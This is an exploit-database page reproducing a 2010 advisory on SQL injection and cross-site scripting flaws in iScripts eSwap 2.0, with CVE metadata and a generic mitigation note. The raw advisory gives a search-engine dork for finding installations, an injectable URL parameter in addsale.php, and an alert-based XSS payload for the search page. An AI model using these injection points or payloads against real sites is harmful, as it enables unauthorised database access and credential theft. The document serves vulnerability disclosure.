header-logo
Suggest Exploit
vendor:
iScripts eSwap
by:
Sid3^effects
7,4
CVSS
HIGH
SQL Injection and Cross-Site Scripting
89
CWE
Product Name: iScripts eSwap
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: CVE-2010-2245
CPE: a:iscripts:eswap:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2010

iScripts eSwap v2.0 sqli and xss vulnerability

iScripts eSwap version 2.0 is vulnerable to an SQL injection vulnerability and a cross-site scripting vulnerability due to insufficient sanitization of user-supplied data. An attacker can exploit this vulnerability by sending malicious SQL queries to the application, which can be used to gain access to sensitive information stored in the database. Additionally, an attacker can exploit the cross-site scripting vulnerability by injecting malicious JavaScript code into the application, which can be used to steal user credentials or perform other malicious activities.

Mitigation:

To mitigate this vulnerability, users should ensure that all user-supplied data is properly sanitized before being used in the application. Additionally, users should ensure that all input fields are properly validated and that all output is properly encoded.
Source

Exploit-DB raw data:

# Title:iScripts eSwap v2.0 sqli and xss vulnerability
# Author: Sid3^effects 
# Published: 2010-06-05  
# price:$99.95
# email:shell_c99@yahoo.com 
# vendor: iScripts
# url : http://www.iscripts.com/eswap/
# google dork : Powered by iScripts eSwap.   

############################################################################

        ooooo  .oooooo.  oooooo   oooooo     oooo  

        `888' d8P'  `Y8b  `888.    `888.     .8'  

         888 888           `888.   .8888.   .8'  

         888 888            `888  .8'`888. .8'  

         888 888             `888.8'  `888.8'   

         888 `88b    ooo      `888'    `888'  

        o888o `Y8bood8P'       `8'      `8'     

                                           
--------------------------------------------------------------------------------------  

#####################Sid3^effects aKa HaRi##################################  

#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]  

#Thanks:*L0rd ÇrusAdêr*,d4rk-blu?®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR  

#ShouTZ:kedar,dec0d3r,41.w4r10r

#spl shoutz:LiquidWorm,gunslinger_ :D       

#Catch us at www.andhrahackers.com or www.teamicw.in  

############################################################################  
Description : 
 
iScripts eSwap enables you to create an virtual swapmeet site in minutes. End users can list items for swap, sell or buy. Let end users to swap unwanted items for things they want! Users can add items for sale or swap. They can also add their wish list for trading items. eSwap lets you charge users a fee for listing, featured listing and optional escrow service. Credit card payments through Authorize.net , Paypal, 2checkout and Google checkout are supported. Also offline payment methods are supported. The powerful admin section allows you to have multiple categories, sub categories and control every aspects of the business. This exchange platform is the ultimate green business by helping your users to recycle
############################################################################  

Sql injection and XSS is found in the eswap script V2.0

Xploit :\m/  sqli \m/


   demo : http://[site]/eswap/demo/addsale.php?type=[Sqli]

Xploit: \m/ Xss \m/
  
      XSS is found in search field :D
                
   Attack pattern : '"--><script>alert(0x000872)</script>

   demo :http://[site]/eswap/demo/search.php
          
############################################################################  

#Sid3^effects

Navigation

Suggest Exploit

Services By CQR